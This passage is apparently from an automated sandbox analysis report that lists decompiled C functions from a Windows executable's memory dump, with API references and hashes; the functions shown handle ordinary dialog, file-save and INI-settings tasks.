						_t60 = E0040546C( *((intOrPtr*)(_t92 +  *((intOrPtr*)(_t76 + 0x2e4)) + 0x10)), _a4);
						_t62 = E0040546C( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x48)) + _t92 + 0x10)), _a4);
						_t95 = _t95 + 0x10;
						__eflags = _t60;
						if(_t60 >= 0) {
							L17:
							_v12 =  *((intOrPtr*)(_t92 +  *((intOrPtr*)(_t76 + 0x2e4))));
							goto L18;
						}
						__eflags = _t62;
						if(_t62 < 0) {
							goto L18;
						}
						goto L17;
						L18:
						_v8 = _v8 + 1;
						_t92 = _t92 + 0x14;
						__eflags = _v8 -  *((intOrPtr*)(_t76 + 0x2e0));
					} while (_v8 <  *((intOrPtr*)(_t76 + 0x2e0)));
					goto L19;
				}
				_t94 = 0;
				__eflags = 0;
				do {
					_push(_a4);
					_t66 =  *((intOrPtr*)(_t76 + 0x2e4));
					_push( *((intOrPtr*)(_t94 + _t66 + 0x10)));
					L0040E03E();
					_push(_a4);
					_t67 =  *((intOrPtr*)(_t76 + 0x48));
					_push( *((intOrPtr*)(_t67 + _t94 + 0x10)));
					L0040E03E();
					_t95 = _t95 + 0x10;
					__eflags = _t66;
					if(_t66 == 0) {
						L11:
						_v12 =  *(_t94 +  *((intOrPtr*)(_t76 + 0x2e4)));
						_v16 = 1;
						goto L12;
					}
					__eflags = _t67;
					if(_t67 != 0) {
						goto L12;
					}
					goto L11;
					L12:
					_v8 = _v8 + 1;
					_t94 = _t94 + 0x14;
					__eflags = _v8 -  *((intOrPtr*)(_t76 + 0x2e0));
				} while (_v8 <  *((intOrPtr*)(_t76 + 0x2e0)));
				__eflags = _v16;
				if(_v16 != 0) {
					goto L19;
				}
				goto L14;
			}

0x0040a08d
0x0040a08f
0x0040a096
0x0040a099
0x0040a09b
0x0040a09b
0x0040a0a9
0x00000000
0x00000000
0x0040a0ab
0x0040a0af
0x00000000
0x00000000
0x0040a0b2
0x0040a0bb
0x00000000
0x00000000
0x0040a0bd
0x0040a0be
0x0040a0c6
0x0040a0e7
0x0040a0e7
0x0040a1af
0x0040a1b6
0x0040a1b8
0x0040a1b8
0x0040a1bf
0x0040a1c5
0x0040a1c8
0x0040a1ce
0x0040a1d6
0x0040a1d6
0x0040a0ef
0x0040a0f5
0x0040a0f8
0x0040a0fb
0x0040a157
0x0040a157
0x0040a159
0x0040a15f
0x0040a162
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a164
0x0040a164
0x0040a171
0x0040a182
0x0040a187
0x0040a18a
0x0040a18c
0x0040a192
0x0040a19b
0x00000000
0x0040a19b
0x0040a18e
0x0040a190
0x00000000
0x00000000
0x00000000
0x0040a19e
0x0040a19e
0x0040a1a4
0x0040a1a7
0x0040a1a7
0x00000000
0x0040a164
0x0040a0fd
0x0040a0fd
0x0040a0ff
0x0040a0ff
0x0040a102
0x0040a108
0x0040a10c
0x0040a111
0x0040a116
0x0040a119
0x0040a11d
0x0040a122
0x0040a125
0x0040a127
0x0040a12d
0x0040a136
0x0040a139
0x00000000
0x0040a139
0x0040a129
0x0040a12b
0x00000000
0x00000000
0x00000000
0x0040a140
0x0040a140
0x0040a146
0x0040a149
0x0040a149
0x0040a151
0x0040a155
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00407A66: ??2@YAPAXI@Z.MSVCRT ref: 00407A87
Part of subcall function 00407A66: ??3@YAXPAX@Z.MSVCRT ref: 00407B4E

wcslen.MSVCRT ref: 0040A0B2
_wtoi.MSVCRT ref: 0040A0BE
_wcsicmp.MSVCRT ref: 0040A10C
_wcsicmp.MSVCRT ref: 0040A11D

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsicmp$??2@??3@_wtoiwcslen
String ID:
API String ID: 1549203181-0
Opcode ID: 7dd6d63d10815eadb1078566161622f675861b17a3bacd31860cb4180f0995c0
Instruction ID: 173153ae92e8ec93863a9f5982dcfa1c11e383f1bf25a9e136d2eac58130d476
Opcode Fuzzy Hash: 7dd6d63d10815eadb1078566161622f675861b17a3bacd31860cb4180f0995c0
Instruction Fuzzy Hash: D2415C31900304AFCB21DF69C580A9EBBB4EF44355F1444BAEC05EB396D678DAA18B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB6E, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AB6E(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v12;
				char _v16;
				char* _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				char* _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char* _v76;
				char _v80;
				void _v2126;
				signed short _v2128;
				void* __ebx;
				void* __edi;
				char _t32;
				intOrPtr _t33;
				char _t34;
				intOrPtr _t38;
				signed short _t57;
				char* _t62;
				char* _t64;

				_v2128 = _v2128 & 0x00000000;
				memset( &_v2126, 0, 0x7fe);
				_t32 =  *((intOrPtr*)(L"txt")); // 0x780074
				_v16 = _t32;
				_t33 =  *0x410294; // 0x74
				_v12 = _t33;
				_t34 = E00406827(0x1f5);
				_t64 = L"*.txt";
				_v80 = _t34;
				_v76 = _t64;
				_v72 = E00406827(0x1f6);
				_v68 = _t64;
				_v64 = E00406827(0x1f7);
				_v60 = L"*.json";
				_v56 = E00406827(0x1fb);
				_v52 = L"*.csv";
				_t38 = E00406827(0x1f8);
				_t62 = L"*.htm;*.html";
				_v48 = _t38;
				_v44 = _t62;
				_v40 = E00406827(0x1f9);
				_v36 = _t62;
				_v32 = E00406827(0x1fa);
				_v28 = L"*.xml";
				_v24 = E00406827(0x1fc);
				_v20 = _t64;
				E00406050( &_v2128,  &_v80);
				_t57 = 7;
				return E00405DCD(_a12,  *((intOrPtr*)(_a4 + 0x208)), _a8,  &_v2128, E00406827(_t57),  &_v16);
			}

0x0040ab77
0x0040ab90
0x0040ab95
0x0040ab9a
0x0040ab9d
0x0040abaa
0x0040abad
0x0040abb2
0x0040abb8
0x0040abbb
0x0040abc8
0x0040abcb
0x0040abd6
0x0040abd9
0x0040abea
0x0040abed
0x0040abf4
0x0040abf9
0x0040abff
0x0040ac02
0x0040ac0f
0x0040ac12
0x0040ac1d
0x0040ac20
0x0040ac2c
0x0040ac39
0x0040ac3c
0x0040ac44
0x0040ac71

APIs

memset.MSVCRT ref: 0040AB90

Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F

Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4

Part of subcall function 00406050: memset.MSVCRT ref: 00406071
Part of subcall function 00406050: _snwprintf.MSVCRT ref: 0040609F
Part of subcall function 00406050: wcslen.MSVCRT ref: 004060AB
Part of subcall function 00406050: memcpy.MSVCRT ref: 004060C3
Part of subcall function 00406050: wcslen.MSVCRT ref: 004060D1
Part of subcall function 00406050: memcpy.MSVCRT ref: 004060E4

Part of subcall function 00405DCD: GetSaveFileNameW.COMDLG32(?), ref: 00405E1C
Part of subcall function 00405DCD: wcscpy.MSVCRT ref: 00405E33

Strings

*.htm;*.html, xrefs: 0040ABF9
*.txt, xrefs: 0040ABB2
txt, xrefs: 0040AB95

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
String ID: *.htm;*.html$*.txt$txt
API String ID: 1392923015-1706329710
Opcode ID: 9ddafcd3e3873cef2600ad60d320d0a67768a4cae7d1907286cd4c839e47c819
Instruction ID: 6a1f0fe5a8f9a0d06c10808573add6bd6f8ed95605c5985f6cf117c7f3196cfa
Opcode Fuzzy Hash: 9ddafcd3e3873cef2600ad60d320d0a67768a4cae7d1907286cd4c839e47c819
Instruction Fuzzy Hash: 5C215EB2D0121A9FCB40EF96D885ADDBBB4FF04308F10807BE409B7281DB7859418F99

Uniqueness

Uniqueness Score: -1.00%

Function 00406613, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00406613(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040E038();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040E032();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}

0x00406613
0x00406614
0x00406614
0x00406617
0x0040661b
0x0040662e
0x0040662e
0x00406632
0x00406634
0x0040663a
0x0040663b
0x0040663e
0x00406647
0x00406648
0x0040664d
0x00406657
0x00406659
0x0040665e
0x00406665
0x0040666f
0x00406671
0x00406672
0x00406677
0x0040667e
0x00406687
0x0040661d
0x0040661d
0x0040661f
0x00406621
0x00406626
0x00406627
0x0040662a
0x0040662c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040662c
0x00406697
0x0040669a
0x004066a3
0x004066a3
0x0040668c
0x00406690

APIs

??2@YAPAXI@Z.MSVCRT ref: 00406648
memset.MSVCRT ref: 00406659
memcpy.MSVCRT ref: 00406665
??3@YAXPAX@Z.MSVCRT ref: 00406672

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: 8e0fc6793aebc9f9da890fe29524187452bc62cfb9288e210baf46e5438cf18a
Instruction ID: 0097541d92ab95bcfef6608398cdc2c51d263adba4e227b481c9d82b5fae792d
Opcode Fuzzy Hash: 8e0fc6793aebc9f9da890fe29524187452bc62cfb9288e210baf46e5438cf18a
Instruction Fuzzy Hash: EB114C716046019FD328DF2DC881A26F7E9EFD8300B218D3EE59A97395DA76E811CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5E8, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E0040D5E8(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040E340(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40f454,  &_v16392, 0x2000, _a20);
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E00405F0A( &_v16392, _t34, _a16);
				} else {
					memset();
					E00405E81(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}

0x0040d5e8
0x0040d5f0
0x0040d5fc
0x0040d601
0x0040d602
0x0040d60f
0x0040d611
0x0040d612
0x0040d647
0x0040d669
0x0040d676
0x0040d67f
0x0040d681
0x0040d614
0x0040d614
0x0040d625
0x0040d643
0x0040d643
0x0040d68d

APIs

memset.MSVCRT ref: 0040D614

Part of subcall function 00405E81: _snwprintf.MSVCRT ref: 00405EC6
Part of subcall function 00405E81: memcpy.MSVCRT ref: 00405ED6

WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040D63D
memset.MSVCRT ref: 0040D647
GetPrivateProfileStringW.KERNEL32 ref: 0040D669

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
String ID:
API String ID: 1127616056-0
Opcode ID: 1ef896f5ac476238214e2e7a1c8d83b09bc725c3f104deaf738d1964be3b1b7d
Instruction ID: e5ada5cee961c9ffd84a11649d97ac6ffa4cf685c3efd691eec2e39df5646265
Opcode Fuzzy Hash: 1ef896f5ac476238214e2e7a1c8d83b09bc725c3f104deaf738d1964be3b1b7d
Instruction Fuzzy Hash: D5118272500119AFDF11AF65DC02E9E7B79EF04704F100476FF09B20A1E6359A649F9D

Uniqueness

Uniqueness Score: -1.00%

Function 00402B94, Relevance: 6.1, APIs: 4, Instructions: 53
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B94(struct HWND__* _a4, int _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
				signed int _v32;
				void _v48;
				void* _v52;
				int _v68;
				intOrPtr _v72;
				signed int _v80;
				int _v92;
				void _v96;
				void* _v100;
				signed int _t34;

				memset( &_v96, 0, 0x2c);
				_v100 = _a12;
				_v80 = _a16;
				_v72 = _a20;
				_v96 = 0;
				_v92 = 0;
				_v68 = 0;
				memset( &_v48, 0, 0x2c);
				_v52 = 4;
				if(SendMessageW(_a4, 0x120b, _a8,  &_v52) != 0) {
					_t34 = _v32 & 0x00000003;
					if(_t34 != 0) {
						_v80 = _v80 & 0xfffffffc | _t34;
					}
				}
				return SendMessageW(_a4, 0x120c, _a8,  &_v100);
			}

0x00402ba8
0x00402bb0
0x00402bb7
0x00402bc0
0x00402bca
0x00402bce
0x00402bd2
0x00402bd6
0x00402bec
0x00402c00
0x00402c06
0x00402c09
0x00402c14
0x00402c14
0x00402c09
0x00402c2e

APIs

memset.MSVCRT ref: 00402BA8
memset.MSVCRT ref: 00402BD6
SendMessageW.USER32(?,0000120B), ref: 00402BFC
SendMessageW.USER32(?,0000120C,?,?), ref: 00402C28

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendmemset
String ID:
API String ID: 568519121-0
Opcode ID: 3dbf91b2b69beef7f82be7727ae9dd33bc881aaf68ef105acbafed814d97d997
Instruction ID: b9af20001e59f3bd0701389c088e4a3ca17ea943e2d6bc3205c17ab3910d7cc1
Opcode Fuzzy Hash: 3dbf91b2b69beef7f82be7727ae9dd33bc881aaf68ef105acbafed814d97d997
Instruction Fuzzy Hash: 61115B72508314ABD711DF14CC0199FBFE8EB89750F004A2AFA64E7290D371DA20CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3BF, Relevance: 6.0, APIs: 4, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040A3BF(void* __esi) {
				void* _v516;
				long _v1028;
				void* __ebx;
				wchar_t* _t15;
				signed short _t23;
				signed short _t25;
				void* _t29;

				_t29 = __esi;
				_push(E0040778A( *((intOrPtr*)(__esi + 0x69c))));
				_t23 = 4;
				_push(E00406827(_t23));
				_push(0xff);
				_push( &_v516);
				L0040DFD6();
				_t15 = E00407E16( *((intOrPtr*)(__esi + 0x69c)), 0);
				if(_t15 > 0) {
					_push(_t15);
					_t25 = 5;
					_push(E00406827(_t25));
					_push(0xff);
					_push( &_v1028);
					L0040DFD6();
					_t15 = wcscat( &_v516,  &_v1028);
				}
				if( *((intOrPtr*)(_t29 + 0x208)) != 0) {
					return SendMessageW( *(_t29 + 0x214), 0x40b, 0,  &_v516);
				}
				return _t15;
			}

0x0040a3bf
0x0040a3d5
0x0040a3d8
0x0040a3de
0x0040a3ea
0x0040a3eb
0x0040a3ec
0x0040a3fc
0x0040a403
0x0040a405
0x0040a408
0x0040a40e
0x0040a415
0x0040a416
0x0040a417
0x0040a42a
0x0040a42f
0x0040a43b
0x00000000
0x0040a451
0x0040a458

APIs

Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F

_snwprintf.MSVCRT ref: 0040A3EC
SendMessageW.USER32(?,0000040B,00000000,?), ref: 0040A451

Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4

_snwprintf.MSVCRT ref: 0040A417
wcscat.MSVCRT ref: 0040A42A

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
String ID:
API String ID: 822687973-0
Opcode ID: fa48f0b94a06f49b58a326b4bcc618fa866d7abdeda14d17ebe30566094cc372
Instruction ID: d08295fd2af1cf787610e7cf5331bd4bc3d6faa59d3d329b1d8aec9a5db4e45c
Opcode Fuzzy Hash: fa48f0b94a06f49b58a326b4bcc618fa866d7abdeda14d17ebe30566094cc372
Instruction Fuzzy Hash: 5C01D8B29003096AE720F275CC8AFA773ACAB40318F00447EB71AF10C2D679A9154A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040576B, Relevance: 6.0, APIs: 4, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040576B(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}

0x00405789
0x00405791
0x00405795
0x00405798
0x0040579b
0x004057b9
0x004057b9
0x0040579d
0x0040579d
0x004057ae
0x004057b7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004057b7
0x004057ca
0x004057ce
0x004057ce
0x004057bb
0x004057bf

APIs

GetDlgItem.USER32 ref: 00405779
SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00405791
SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 004057A7
SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 004057CA

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item
String ID:
API String ID: 3888421826-0
Opcode ID: 84320e977df6a92d9295fdec2ba4224318a32ded31fcf9cf43a568e2f97b542c
Instruction ID: ea6b6bb6de5f5fc2c04e1b050f2a77b7acc78c850c927156145779c4c3b5f003
Opcode Fuzzy Hash: 84320e977df6a92d9295fdec2ba4224318a32ded31fcf9cf43a568e2f97b542c
Instruction Fuzzy Hash: FEF01975A0010CFFEB119F95CDC5DAFBBB9EB49794F20447AFA04E6150D2709E01AA64

Uniqueness

Uniqueness Score: -1.00%

Function 00402F8E, Relevance: 6.0, APIs: 4, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00402F8E(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				struct HWND__* _t16;
				intOrPtr* _t36;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr* _t49;

				_t40 = __edx;
				_push(__ebx);
				_t47 = __ecx;
				E00401712( *((intOrPtr*)(__ecx + 0x10)), __edx, __ecx + 0x40, __eflags);
				E0040DB6F(GetDlgItem( *(_t47 + 0x10), 0x3f1));
				SetFocus(GetDlgItem( *(_t47 + 0x10), 0x3ee));
				_t16 = GetDlgItem( *(_t47 + 0x10), 0x3ee);
				E00405700(_t16, E00406827(0x3b7), 1);
				E00405700(_t16, E00406827(0x3b8), 2);
				E0040300B(_t47);
				_t36 = _t47;
				_pop(_t48);
				_t49 = _t36;
				 *((intOrPtr*)( *_t49 + 4))(1, _t48);
				 *((intOrPtr*)( *_t49 + 0x1c))();
				E00405B17(_t40,  *((intOrPtr*)(_t49 + 0x10)), 4);
				return 0;
			}

0x00402f8e
0x00402f8e
0x00402f90
0x00402f99
0x00402faf
0x00402fc2
0x00402fcc
0x00402fdc
0x00402ff2
0x00402ffc
0x00403002
0x00403004
0x0040165a
0x00401660
0x00401667
0x0040166f
0x00401679

APIs

Part of subcall function 00401712: GetClientRect.USER32 ref: 0040171E
Part of subcall function 00401712: GetWindow.USER32(?,00000005), ref: 00401737
Part of subcall function 00401712: GetWindow.USER32(00000000), ref: 0040173A
Part of subcall function 00401712: GetWindow.USER32(00000000,00000002), ref: 0040174C

GetDlgItem.USER32 ref: 00402FAC

Part of subcall function 0040DB6F: LoadLibraryW.KERNEL32(shlwapi.dll,74EB48C0,?,00402FB4,00000000), ref: 0040DB78
Part of subcall function 0040DB6F: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040DB86
Part of subcall function 0040DB6F: FreeLibrary.KERNEL32(00000000,?,00402FB4,00000000), ref: 0040DB9E

GetDlgItem.USER32 ref: 00402FBF
SetFocus.USER32(00000000), ref: 00402FC2
GetDlgItem.USER32 ref: 00402FCC

Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F

Part of subcall function 00405700: SendMessageW.USER32(?,00000143,00000000,?), ref: 00405717
Part of subcall function 00405700: SendMessageW.USER32(?,00000151,00000000,?), ref: 00405729

Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemWindow$HandleLibraryLoadMessageModuleSend$AddressClientFocusFreeProcRectStringmemcpywcscpywcslen
String ID:
API String ID: 2946568780-0
Opcode ID: 52cbf3b4b279be617207ad7872dd7437349133491b3365fd1e852972f4b5ad5a
Instruction ID: 30f591fb8b2f5730a97996d02f89d272a17373ddbf4734e32a48e8550da6c286
Opcode Fuzzy Hash: 52cbf3b4b279be617207ad7872dd7437349133491b3365fd1e852972f4b5ad5a
Instruction Fuzzy Hash: 46F0C8B2A00700E7D22177B6AC46E2B76ACEF84719F06093EF541F71D2CA799D055658

Uniqueness

Uniqueness Score: -1.00%

Function 0040877D, Relevance: 6.0, APIs: 4, Instructions: 41
filestringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040877D(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v32775;
				char _v32776;

				E0040E340(0x8004, __ecx);
				_v32776 = 0;
				memset( &_v32775, 0, 0x7fff);
				WideCharToMultiByte(0xfde9, 0, _a8, 0xffffffff,  &_v32776, 0x7fff, 0, 0);
				return WriteFile(_a4,  &_v32776, strlen( &_v32776),  &_v8, 0);
			}

0x00408785
0x0040879c
0x004087a2
0x004087bf
0x004087eb

APIs

memset.MSVCRT ref: 004087A2
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000003,000000FF,?,00007FFF,00000000,00000000), ref: 004087BF
strlen.MSVCRT ref: 004087D1
WriteFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 004087E2

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: 51ae4e62cfb9bf55f12b25eeafec9d01389194143adb00a77a57f99ffa8f8497
Instruction ID: be2e12bba75bd4d95a24d89f44609daf6c821d09d66759c01e9b41f40a714cd1
Opcode Fuzzy Hash: 51ae4e62cfb9bf55f12b25eeafec9d01389194143adb00a77a57f99ffa8f8497
Instruction Fuzzy Hash: 66F062B640112CBEEB91AB95DD81DEB776CEB04258F0045B2B705E6180D974AE484F7C

Uniqueness

Uniqueness Score: -1.00%

Function 004087EC, Relevance: 6.0, APIs: 4, Instructions: 41
filestringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004087EC(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040E340(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}

0x004087f4
0x0040880b
0x00408811
0x0040882a
0x00408856

APIs

memset.MSVCRT ref: 00408811
WideCharToMultiByte.KERNEL32(00000000,00000000,00000003,000000FF,?,00001FFF,00000000,00000000), ref: 0040882A
strlen.MSVCRT ref: 0040883C
WriteFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 0040884D

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

